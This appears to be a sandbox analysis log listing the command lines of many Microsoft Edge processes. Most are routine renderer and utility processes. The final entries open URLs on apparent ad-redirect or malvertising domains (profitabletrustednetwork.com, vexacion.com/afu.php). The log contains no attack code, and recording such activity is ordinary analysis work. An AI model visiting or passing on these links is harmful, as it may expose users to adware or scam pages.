C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 /prefetch:814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1876 /prefetch:214⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4440 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1944 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4276 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6124 /prefetch:814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5712 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4268 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3052 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5872 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4320 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6844 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6116 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5136 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4428 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1680 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6476 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7052 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5752 /prefetch:814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2976 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6508 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,8207071110394153765,15097749921342962173,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:114⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff870f746f8,0x7ff870f74708,0x7ff870f7471814⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148313⤵
-
